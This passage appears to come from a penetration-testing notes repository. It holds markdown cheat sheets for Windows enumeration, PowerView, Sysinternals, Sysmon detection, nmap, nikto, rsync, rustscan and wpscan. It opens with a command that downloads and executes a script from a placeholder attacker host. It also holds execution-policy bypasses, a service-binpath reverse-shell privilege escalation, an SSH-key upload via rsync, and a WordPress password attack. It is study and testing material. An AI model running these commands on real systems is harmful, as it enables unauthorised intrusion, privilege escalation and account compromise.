powershell -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://%ATTACKER_IP%/PowerView.ps1'); Get-NetUser | select samaccountname, description"
```
## Base64 Decode File
```
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content .\Desktop\b64.txt)))
```
## **Circumvent Execution-Policy**
```sh
powershell -ExecutionPolicy Bypass -File .\<file>
```
```sh
Set-ExecutionPolicy Bypass -Scope Process
```
## Enumeration
### Users
```
Get-LocalUser
```
* Password not required users
```
Get-LocalUser | Where-Object -Property PasswordRequired -Match false
```
* SID of users
```
Get-WmiObject win32_useraccount | Select name, sid
```
### Network intel
* Connections
```sh
netstat -ano
```
* IP Address
```
Get-NetIpAddress
```
* Listening TCP Ports
```
Get-NetTCPConnection | Where-Object -Property State -Match Listen | measure
```
* TCP Port by number
```
Get-NetTCPConnection | Where-Object -Property LocalPort -Match 443
```
### Patch level and updates
```
Get-Hotfix
```
* Find patch by HotFixID
```
Get-Hotfix | Where-Object -Property HotFixID -Match KB124284
```
```sh
wmic qfe get Caption,Description,HotFixID,InstalledOn
```
### Drivers
```sh
driverquery
```
### Processes
* Start processes
```sh
Start-Process <process>
```
* Running processes
```sh
Get-Process <process>
```
### Scheduled tasks
```sh
schtasks /query /fo LIST /v
```
```sh
Get-ScheduledTaskInfo
```
* Scheduled Tasks, by TaskName
```
Get-ScheduledTask | Where-Object -Property TaskName -Match taskname
```
or
```
Get-ScheduledTask -TaskName taskname
```
### Alternate Data Stream(ADS)
* Show ADS
```sh
Get-Item -Path file.exe -Stream *
```
* Open ADS
```sh
wmic process call create $(Resolve-Path file.exe:streamname)
```
### Export Output
* Export as CSV
```sh
Get-Process <process> | Export-Csv <output.csv>
```
### ACL
* Owner of files
```
Get-ACL C:\
```
### Port Scanner
```
for($i=1; $i -le 65536; $i++) { Test-NetConnection localhost -Port $i}
```
### Ping Hosts
```sh
1..15 | %{echo "10.0.2.$_"; ping -n 1 10.0.2$_ | Select-String ttl}
```
### Antivirus
```sh
sc query windefend
```
* Service name unknown
```sh
sc queryex type=service
```
### Using Powerview
```sh
Import-Module .\powerview.ps1
Get-NetDomainController
(Get-NetUser).name
Get-NetUser -properties description
Get-NetUser | select -ExpandProperty lastlogon
Get-NetComputer -ping
Get-NetGroupMember "Domain Admins"
Find-DomainShare -CheckShareAccess
```
* Enumerate Group Policy
```sh
Get-NetGPO
```
* Trust relationship to other domains
```sh
Get-NetDomainTrust
```
* User enumeration
```sh
Find-LocalAdminAccess
```
```sh
whoami /priv
```
```
Import-Module ActiveDirectory
Get-ADGroup
Get-ADGroupMember
Get-ADPrincipalGroupMembership
```

10
Enumeration/Windows/RPCclient.md Normal file
View File

@ -0,0 +1,10 @@
# RPCclient
* Enumerate users and groups
```sh
rpcclient <domain> <users>
rpcclient $> enumdomusers
...
rpcclient $> enumdomgroups
```

125
Enumeration/Windows/Sysinternals.md Normal file
View File

@ -0,0 +1,125 @@
# Sysinternals and CLI usage
## Opening System Properties
```
sysdm.cpl
```
## Installing webdav server,
* Starting windows webclient service
```
get-service webclient
start-service webclient
```
* Opening NetworkAndSharingCenter
```
control.exe /name Microsoft.NetworkAndSharingCenter
```
## Make sure Network Discovery is enabled, advanced settings!
```
Install-WindowsFeature WebDAV-Redirector Restart
Get-WindowsFeature WebDAV-Redirector | Format-Table Autosize
```
## Sigcheck
Sigcheck is a command-line utility that shows file version number, timestamp information, and digital signature details, including certificate chains. It also includes an option to check a files status on VirusTotal, a site that performs automated file scanning against over 40 antivirus engines, and an option to upload a file for scanning.
* Check for unsigned files in `C:\Windows\system32`
```
sigcheck -u -e C:\Windows\System32
```
* `-u` "If VirusTotal check is enabled, show files that are unknown by VirusTotal or have non-zero detection, otherwise show only unsigned files."
* `-e` "Scan executable images only (regardless of their extension)"
## Alternate Data Stream (ADS)
By default, all data is stored in a file's main unnamed data stream, but by using the syntax 'file:stream', you are able to read and write to alternates. (official definition)
```
streams file.txt
notepad file.txt:<datastream_name>
or
Get-Content -Path .\file.txt -stream ads.txt
```
## SDelete
SDelete is a command line utility that takes a number of options. In any given use, it allows you to delete one or more files and/or directories, or to cleanse the free space on a logical disk.
## TCPView
TCPView provides a more informative and conveniently presented subset of the Netstat program that ships with Windows. The TCPView download includes Tcpvcon, a command-line version with the same functionality.
```
tcpview
tcpvcon
```
## Autoruns
Autoruns reports Explorer shell extensions, toolbars, browser helper objects, Winlogon notifications, auto-start services, and much more.
## Procdump
ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike.
## Procdump
The Process Explorer display consists of two sub-windows. The top window always shows a list of the currently active processes, including the names of their owning accounts, whereas the information displayed in the bottom window depends on the mode that Process Explorer is in: if it is in handle mode you'll see the handles that the process selected in the top window has opened; if Process Explorer is in DLL mode you'll see the DLLs and memory-mapped files that the process has loaded.
## Procmon
Process Monitor is an advanced monitoring tool for Windows that shows real-time file system, Registry and process/thread activity.
## Psexec
PsExec is a light-weight telnet-replacement that lets you execute processes on other systems, complete with full interactivity for console applications, without having to manually install client software. PsExec's most powerful uses include launching interactive command-prompts on remote systems and remote-enabling tools like IpConfig that otherwise do not have the ability to show information about remote systems
## Winobj
WinObj is a 32-bit Windows NT program that uses the native Windows NT API (provided by NTDLL.DLL) to access and display information on the NT Object Manager's name space.
## BGInfo
It automatically displays relevant information about a Windows computer on the desktop's background, such as the computer name, IP address, service pack version, and more
## RegJump
This little command-line applet takes a registry path and makes Regedit open to that path. It accepts root keys in standard (e.g. HKEY_LOCAL_MACHINE) and abbreviated form (e.g. HKLM).
```
regjump HKLM
```
* Similar to
```
reg query HKLM
```
```
Get-Item
Get-ItemProperty
```
## Strings
Strings just scans the file you pass it for UNICODE (or ASCII) strings of a default length of 3 or more UNICODE (or ASCII) characters.
## Create a system authority shell
1. Check permissons
```sh
accesschk.exe /accepteula -uwcqv user <serviceName>
```
2. Query service
```sh
sq qc <service>
```
3. Set service config to the msfvenom reverse shell, uploaded previously.
```
sc config daclsvc binpath= "\"C:\shell.exe""
```
4. Start service and gain high priv shell
```sh
net start daclsvc
```
## Tips & Tricks
* [Sysinternal tools can be used without installing](https://live.sysinternals.com/)
* Execute through explorer via
```sh
\\live.sysinternals.com\tools
```

72
Enumeration/Windows/Sysmon.md Normal file
View File

@ -0,0 +1,72 @@
# Sysmon
Sysmon gathers detailed and high-quality logs as well as event tracing that assists in identifying anomalies in your environment. Sysmon is most commonly used in conjunction with security information and event management (SIEM) system or other log parsing solutions that aggregate, filter, and visualize events.
## Paths
* Logfiles
```
Applications and Services Logs/Microsoft/Windows/Sysmon/Operational
```
## Configuration
* [SwiftOnSecurity](https://github.com/SwiftOnSecurity/sysmon-config)
* [ION-Storm](https://github.com/ion-storm/sysmon-config/blob/develop/sysmonconfig-export.xml)
## Installation
```sh
Downloads-SysInternalsTools C:\Sysinternals
```
## Best Practices
* Exclude, not include events
* CLI gives further control over filters
```sh
Get-WinEvent
```
```sh
wevutil.exe
```
* Know the env before implementation
## Filtering Events
* Actions -> Filter Current Log
### Filtering Events with Powershell
* Logged Events containing port 4444
```sh
Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=3 and */EventData/Data[@Name="DestinationPort"] and */EventData/Data=4444'
```
* Logged Events containing lsass.exe
```sh
Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=10 and */EventData/Data[@Name="TargetImage"] and */EventData/Data="C:\Windows\system32\lsass.exe"'
```
* Rats and C2
```sh
Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=3 and */EventData/Data[@Name="DestinationPort"] and */EventData/Data=<Port>'
```
## Evasion Techniques
* Alternate Data Streams
* Injections
* Masquerading
* Packing/Compression
* Recompiling
* Obfuscation
* Anti-Reversing Techniques
* Remote Thread (OpenThread, ResumeThread)
### Detecting Evasion Techniques with Powershell
```sh
Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=15'
Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=8'
```

32
Enumeration/nikto.md Normal file
View File

@ -0,0 +1,32 @@
# Nikto
Scan web server vulnerabilities and more.
## mmap Input
* Pipe or pre run nmap
```sh
nmap -p80 172.16.0.0/24 -oG - | nikto -h -
```
```sh
nmap -oG -Pn -p-10000 10.10.214.141 | nikto -h 10.10.214.141 -p -
```
# Usage
* Example
```
nikto -h http://example.com i -p 80,8080
```
```sh
nikto -id <user>:<password> -h http://example.com:1234/manager/html
```
## Plugins
```sh
nikto -h http://example.com -Plugins apacheusers
```
* List all plugins
```sh
nikto -list-plugins
```

127
Enumeration/nmap.md Normal file
View File

@ -0,0 +1,127 @@
# nmap
## Scan Types
* ARP
* ICMP
* TCP
* UDP
## Port States
1. Open
2. Closed
3. Filtered
4. Unfiltered
5. Open|Filtered
6. Close|Filtered
## Usage
```sh
nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit <IP>
```
```sh
nmap -oA nmap-vuln -Pn -script vuln -p <Port,Port,Port,...> <IP>
```
### combo with searchsploit
* nmap-full scan
```sh
sudo nmap -oA --nmap-full -sS -sC -sV -p- --defeat-rst-ratelimit <target-IP>
searchsploit --nmap ./nmap-full.xml --verbose
```
### Wordpress Enumeration
```sh
nmap --script http-wordpress-enum --scripts-args check-latest=true,search-limit=1500 -p 80 test.com
```
### Use List of Hosts
```sh
nmap -iL <ListofHosts>
```
* Show hosts, dns resolution included
```sh
nmap -sL -n 10.10.0.0/16
```
### ARP Scan Local Network
```sh
nmap -PR -sn 192.168.0.0/24
```
### ICMP Scans
* __Type 8__ (Ping Request)
```sh
nmap -PE -sn 10.10.0.0/16
```
* __Type 13__ (Timestamp Request)
```sh
nmap -PP -sn 10.10.0.0/16
```
* __Type 17__ (Address Mask Queries)
```sh
nmap -PM -sn 10.10.0.0/16
```
### TCP Scans
* `-PS23` Syn on port 23
* `-PA80-8080` ACK on port range 80-8080
#### TCP Scan Types
* __Null Scan__ `-sN`, port is open when there is no response. Otherwise the response is `RST/ACK`
* __FIN Scan__ `-sF` , same procedure as null scan.
* __Xmas Scan__ `-sX`, `FIN/PSH/URG` is sent. `RST/ACK` when port is closed.
* __Maimon Scan__ `-sM`, sends `FIN/ACK`. Packet is dropped when port is open. Only viable on old BSD networks.
* __ACK Scan__ `-sA`, sends `ACK`. Receives `RST` regardless of the state of the port. May be used to explore firewall rules.
* __Window Scan__ `-sW`, sends `ACK`, and receives `RST` as well. Inspects the window part of the response. Used to expose firewall rules.
* __Custom Scan__ `--scanflags RSTACKFIN`, set flags randomly.
### UDP SCans
* `-PU`
* May be answered by ICMP Type 3 if the port is not reachable
### DNS Scan
* No lookup `-n`
* Reverse lookup for every host `-R`
* Host discovery only `-sn`
### Spoofing
* IP `-S <spoofed-IP>`
* MAC `--spoof-mac <spoofed-MAC>`
* Disable ping scan `-Pn`
* Decoy addresses `-D <decoy-IP>,<decoy-IP>,<decoy-IP>,RND,RND,ME`
### Service Detection
* `-sV`
* `--version-intensity <level 0-9>`
* Intensity 2 `--version-light`
* Intensity 9 `--version-all`
## Scripts
Installed at `/usr/share/nmap/scripts`
* __auth__ Authentication related scripts
* __broadcast__ Discover hosts by sending broadcast messages
* __brute__ Performs brute-force password auditing against logins
* __default__ Default scripts, same as -sC
* __discovery__ Retrieve accessible information, such as database tables and DNS names
* __dos Detects__ servers vulnerable to Denial of Service (DoS)
* __exploit__ Attempts to exploit various vulnerable services
* __external__ Checks using a third-party service, such as Geoplugin and Virustotal
* __fuzzer__ Launch fuzzing attacks
* __intrusive__ Intrusive scripts such as brute-force attacks and exploitation
* __malware__ Scans for backdoors
* __safe__ Safe scripts that wont crash the target
* __version__ Retrieve service versions
* __vuln__ Checks for vulnerabilities or exploit vulnerable services
## Tips & Tricks
* Scan the 100 most interesting ports via `-F`
* `--top-ports 100`
* One probe every 5 minutes via `-T0`
* A closed port responds with `RST/ACK` to a initial `SYN`
* Scan ports iteratively by using `-r`, not random
* Closed Port
* Control packet rate via `--min-rate` and `--max-rate`
* Control parallel probes via `--min-parallelism` and `--max-parallelism`
* Fragment packets `-f` 8 bytes, `-ff` 16 bytes or `--mtu`
* Zombie Scan `-sI <pwnd-device-IP>` via pwnd host inside the targets network
* `--reason`, `-d`, `-vv`
* `--traceroute`

39
Enumeration/rsync.md Normal file
View File

@ -0,0 +1,39 @@
# rsync
* [netspi article]( https://www.netspi.com/blog/technical/network-penetration-testing/linux-hacking-case-studies-part-1-rsync/)
* [hacktricks' rsync](https://book.hacktricks.xyz/pentesting/873-pentesting-rsync)
## Enumerate
```sh
rsync <target-IP>::
rsync <target-IP>::files
rsync <target-IP>::files/foo/
```
### via netcat
* Another way is the following
```sh
nc -vn $TARGET_IP 873
```
* Repeat the identical handshake, e.g.
```
@RSYNCD: 31.0
```
* List all directories
```sh
#list
```
## Downloads
```sh
rsync <user>@<target-IP>::/files/foo/bar.txt .
rsync -r <user>@<target-IP>::/files/foo .
```
## Uploads
```sh
rsync authorized_keys <user>@<target-IP>::/files/foo/.ssh/
rsync -r documents <user>@<target-IP>::/files/foo/
```

14
Enumeration/rustscan.md Normal file
View File

@ -0,0 +1,14 @@
# Rustscan
* [Rustscan repo](https://github.com/RustScan/RustScan)
* Config at `$HOME/.rustscan_scripts.toml`
## Usage
```sh
rustscan -r ports -a <Target-ip> -- <nmap cmds>
```
* Using nmap parameters
```sh
rustscan -a 127.0.0.1 -- -A -sC
```

35
Enumeration/wpscan.md Normal file
View File

@ -0,0 +1,35 @@
# WPScan
## Themes
```sh
wpscan --url <URL> --enumerate t
```
* `ls` for content
## Plugins
```sh
wpscan --url <URL> --enumerate p
```
## Users
```sh
wpscan --url <URL> --enumerate u
```
## Vulnerabilities
* WPVulnDB API is needed
* Plugins
```sh
wpscan --url <URL> --enumerate vp
```
## Password attack
```sh
wpscan --url <URL> --passwords <wordlist> --usernames <usersFromEnumeration>
```
## WAF Aggressiveness
```sh
wpscan --url <URL> --enumerate p --plugins-detection <aggressive/passive>